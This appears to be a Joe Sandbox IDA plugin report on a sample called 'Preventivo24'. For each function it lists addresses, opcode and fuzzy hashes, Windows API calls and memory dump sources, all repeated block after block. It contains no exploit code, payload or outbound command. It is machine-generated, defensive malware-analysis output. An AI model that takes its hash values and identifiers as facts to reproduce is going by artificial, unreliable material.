Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend$Window$AddressCreateLongProc
String ID: SysListView32
API String ID: 5470851-78025650
Opcode ID: 531522dc20e46c9a0167be5ac59f798aedc5e3a4570bcb14e87e9fbd2a198e13
Instruction ID: e1aa9815cfff85f16d4ca813fab1f0e63546a002f56dd1cc183cec55a789b5e4
Opcode Fuzzy Hash: 531522dc20e46c9a0167be5ac59f798aedc5e3a4570bcb14e87e9fbd2a198e13
Instruction Fuzzy Hash: 33117936301310AFD2259B25CC05F6BFBA9FBC9B50F004619FA45A73A0CBB1AD00DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B26540 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BEAB55: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB60
Part of subcall function 00BEAB55: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB9A

LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00B2659E
GetProcAddress.KERNEL32(00000000), ref: 00B265A5

Part of subcall function 00BEAB04: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,009EB517,00D2F53C,00C75440), ref: 00BEAB0E
Part of subcall function 00BEAB04: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,009EB517,00D2F53C,00C75440), ref: 00BEAB41
Part of subcall function 00BEAB04: WakeAllConditionVariable.KERNEL32(00D2E924,?,009EB517,00D2F53C,00C75440), ref: 00BEAB4C

Strings

Dbghelp.dll, xrefs: 00B26599
SymFromAddr, xrefs: 00B26594

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$AddressConditionLibraryLoadProcVariableWake
String ID: Dbghelp.dll$SymFromAddr
API String ID: 1702099962-642441706
Opcode ID: e817c42ea5010e79d8a611f330cc74a53693f42601bbfacff972f198c689b7d8
Instruction ID: 0ebc86be937664623433217c7e345b6db2f3b3ba3e6fcb4679d9ae6ebb6c66f8
Opcode Fuzzy Hash: e817c42ea5010e79d8a611f330cc74a53693f42601bbfacff972f198c689b7d8
Instruction Fuzzy Hash: 76015AB1A44B49EFC720CF68ED45B49B7A4EB08B21F100369E829D73D4E77469048A21

Uniqueness

Uniqueness Score: -1.00%

Function 00BEF35C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00BEF30D,?,?,00000000,?,?,?,00BEF437,00000002,FlsGetValue,00C9CCF8,FlsGetValue), ref: 00BEF369
GetLastError.KERNEL32(?,00BEF30D,?,?,00000000,?,?,?,00BEF437,00000002,FlsGetValue,00C9CCF8,FlsGetValue,?,?,00BEC22B), ref: 00BEF373
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00BEF39B

Strings

api-ms-, xrefs: 00BEF380

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: f3c5abd088c253c7aa101665ce384169830fab59a621568ebaca1b2a96de6265
Instruction ID: 7342212e9072a70a5c7081a62f3001378f3d937ea51a4cd3a7331868f51bca3c
Opcode Fuzzy Hash: f3c5abd088c253c7aa101665ce384169830fab59a621568ebaca1b2a96de6265
Instruction Fuzzy Hash: ADE04F30384749FBEF201B62EC06B2D3E99EB00B44F108070FA0DE80E1D7669A509969

Uniqueness

Uniqueness Score: -1.00%

Function 00A0D550 Relevance: 6.3, APIs: 4, Instructions: 337windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00A0D6CD
SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00A0D6E6

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Part of subcall function 00AF90D0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,00000000,?,00A0D728,?,80004005,?), ref: 00AF9157
Part of subcall function 00AF90D0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AF9191

SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00A0D823
SendMessageW.USER32(?,00001061,00000000,00000005), ref: 00A0D91F

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend$AllocateHeapWindow
String ID:
API String ID: 3168177373-0
Opcode ID: 0a647a7ed5e4b5db20ed038b81dea96a4db28c3e64996e37deb004b0f9a5294c
Instruction ID: f4f90c8b172c05272e3e370a99e9e049b6888dc38e03770e69aca30a8be50ace
Opcode Fuzzy Hash: 0a647a7ed5e4b5db20ed038b81dea96a4db28c3e64996e37deb004b0f9a5294c
Instruction Fuzzy Hash: DBD17B72E00219EFDB14DFA8D984BEEBBB5FF48314F144219E815AB2D0DB75A944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009F82F0 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 009F83D8
SysFreeString.OLEAUT32(00000000), ref: 009F842C
SysFreeString.OLEAUT32(00000000), ref: 009F844E
SysFreeString.OLEAUT32(00000000), ref: 009F85E0

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: a55156cb5e73892237d9eb5b8b92e48d2b88acf13a3e436b680f4854a53797cc
Instruction ID: 011e463c5c9bf87f0ae00d375b148546acfe858fcedca6ae54e4bc0b270ba72d
Opcode Fuzzy Hash: a55156cb5e73892237d9eb5b8b92e48d2b88acf13a3e436b680f4854a53797cc
Instruction Fuzzy Hash: F1B13D71A0021E9FDB51DB54CC44BBFBBB8FB48714F104169EA19E73A0DB74AE058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A17220 Relevance: 6.3, APIs: 4, Instructions: 255windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000001,0000110A,00000004,?), ref: 00A17314
SendMessageW.USER32(00000001,0000110A,00000001,00000000), ref: 00A17346
SendMessageW.USER32(?,0000110A,00000004,?), ref: 00A174C0
SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00A174E6

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 49fd933b94fe85e7324ad83d1169980090fee5c011a5c08fb4c8dc9280d3cbcf
Instruction ID: 3cd17b98eb135aee054ec8c91383790cb8e11558b4cfc8d2607f500009f53cf6
Opcode Fuzzy Hash: 49fd933b94fe85e7324ad83d1169980090fee5c011a5c08fb4c8dc9280d3cbcf
Instruction Fuzzy Hash: B8A19E76A04218DFCB15DF68D884BEEBBB5FF48310F195169E851AB291DB30EC85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009FE380 Relevance: 6.2, APIs: 4, Instructions: 228COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 009FE42A
SysFreeString.OLEAUT32(00000000), ref: 009FE470

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: d848ff5889f777ad9277697e7f54205f784287337d3e2b84221d84da81a056c7
Instruction ID: 3deaff1c2f6338f890afbae8c660e1d630c8e1b55c3b56f1ad8cb79d636d920d
Opcode Fuzzy Hash: d848ff5889f777ad9277697e7f54205f784287337d3e2b84221d84da81a056c7
Instruction Fuzzy Hash: DC71AF72A042599FDB10DF58DC44B6EBBB8FB44724F10416AF915D73A0EB76AD00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B08410 Relevance: 6.2, APIs: 4, Instructions: 217COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00D3003C,26FBC52C,00D263B8,054D0D10,?,00D3002C,00D263B8,00C11F80,000000FF,?,00B0866F), ref: 00B084B2
EnterCriticalSection.KERNEL32(00D3001C,26FBC52C), ref: 00B0852F
DestroyWindow.USER32(00000000), ref: 00B0854D
LeaveCriticalSection.KERNEL32(00D3001C), ref: 00B08596

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CriticalSection$DeleteDestroyEnterLeaveWindow
String ID:
API String ID: 307358592-0
Opcode ID: 613005ff63bacf8a5024f366c3d910e0e5598cd7f06383d91b2b1215670a79f2
Instruction ID: 5b4e4ba738c7fbf07bee5fa6a66e30bb58ca6b03300c7fcf429d0fb8864b9ce9
Opcode Fuzzy Hash: 613005ff63bacf8a5024f366c3d910e0e5598cd7f06383d91b2b1215670a79f2
Instruction Fuzzy Hash: 6571CF72A00315DBDB209F18DC44B1ABBF9FF44B10F0542A9E859EB3A0DB75AD44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B412F0 Relevance: 6.2, APIs: 4, Instructions: 184COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00B3BE52,00000000,?,00000000,00000000,?,00000000,?,?,?,00B3BE52,?,00000003), ref: 00B413BD
GetLastError.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00B3BE52,?,00000003,00000009,26FBC52C,00000000), ref: 00B413CE
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00B3BE52,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00B413EF
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00B3BE52,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00B41441

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: a0192cc77d04211396386d9a7d6c2cd36375763b6e47966717eab639d27d28ef
Instruction ID: 22868d9120f06f8b421a020cff52e294197ef3f223c60492871f8fa25a02fdef
Opcode Fuzzy Hash: a0192cc77d04211396386d9a7d6c2cd36375763b6e47966717eab639d27d28ef
Instruction Fuzzy Hash: 6D516A71E04305FBDB206F6C9C81F2B72D9EF04344F244A79FA45E6280EB66DA809B55

Uniqueness

Uniqueness Score: -1.00%

Function 00A019F0 Relevance: 6.2, APIs: 4, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00A01B39
SysAllocString.OLEAUT32(00000000), ref: 00A01B50
VariantClear.OLEAUT32(?), ref: 00A01B6C
VariantClear.OLEAUT32(?), ref: 00A01BA1

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ClearVariant$AllocString
String ID:
API String ID: 2502263055-0
Opcode ID: 42ce572aa73e3148ada419cbe514ef7956fa6b593ff2f5e06e2d015497ed684b
Instruction ID: c29c72b90b83bd50f80d1778e6be3d7318aa12039a8259c8cb7fc459ebeb7a0f
Opcode Fuzzy Hash: 42ce572aa73e3148ada419cbe514ef7956fa6b593ff2f5e06e2d015497ed684b
Instruction Fuzzy Hash: C2518FB1E0026D9BCB20CF18D841BD9B7F4FF49314F1445A9E919E7391EB74AD808B94

Uniqueness

Uniqueness Score: -1.00%

Function 00B36040 Relevance: 6.2, APIs: 4, Instructions: 174COMMON

Download Yara Rule

APIs

GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00B360A2
GetShortPathNameW.KERNEL32(?,?,?), ref: 00B36121
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B36171
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,00000000,00000000), ref: 00B361A7

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiNamePathShortWide
String ID:
API String ID: 3379522384-0
Opcode ID: e6fda1c94b2d4f18945bd757106537f314338f7d797e1acacdae040de3779c38
Instruction ID: 6903084060e58f087564dbc5a27836e028d7cba8314d8a84675e55de8b550337
Opcode Fuzzy Hash: e6fda1c94b2d4f18945bd757106537f314338f7d797e1acacdae040de3779c38
Instruction Fuzzy Hash: E1519171A04619AFD714DFA8DC89B6EF7E5FF44314F208669F925AB2A0DB31AC00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B65010 Relevance: 6.1, APIs: 4, Instructions: 146fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000A3,80000000,00000003,00000000,00000003,00000080,00000000,26FBC52C,00000000,Function_00028630), ref: 00B6505A
GetFileSize.KERNEL32(00000000,00000000), ref: 00B6508B
ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00010000), ref: 00B6511B
CloseHandle.KERNEL32(00000000), ref: 00B651E0

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 1e7c3f7250496eb0933aecde2b1ec52517c4e513d14648b4d1294274c6f1cde3
Instruction ID: 2611caa50b07586b2c480c79b8aa19f5a30def51c8c2fc2b8d89bac2cb8a54e0
Opcode Fuzzy Hash: 1e7c3f7250496eb0933aecde2b1ec52517c4e513d14648b4d1294274c6f1cde3
Instruction Fuzzy Hash: 0E51C171904258AFEB308F69CC85BEDBBF4EF12314F2041D9E559A7282DB751A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A02FB0 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000FC,00000000), ref: 00A03006
GetParent.USER32(?), ref: 00A0303A

Part of subcall function 00BEA23A: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00B4BA31,?,?,?), ref: 00BEA23F
Part of subcall function 00BEA23A: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00BEA246

SetWindowLongW.USER32(?,000000EB), ref: 00A0307B
ShowWindow.USER32(?,00000000), ref: 00A0309D

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$HeapLong$AllocParentProcessShow
String ID:
API String ID: 78937335-0
Opcode ID: 28bea1cdd5f2a929984b2b93619f442e1e018e52e630d6c7d410988f9bfebbd3
Instruction ID: 39610fba4f9fb2a551fe87762498ecd1b189ec98a73e6cbcf9e97bd5a7e8f547
Opcode Fuzzy Hash: 28bea1cdd5f2a929984b2b93619f442e1e018e52e630d6c7d410988f9bfebbd3
Instruction Fuzzy Hash: A5317C756043189FCB11AF29EC84A2ABBE8FF49754B444199FC05DB3A2DB30ED059B62

Uniqueness

Uniqueness Score: -1.00%

Function 00BE82C4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE82CB
std::_Lockit::_Lockit.LIBCPMT ref: 00BE82D6
std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8344

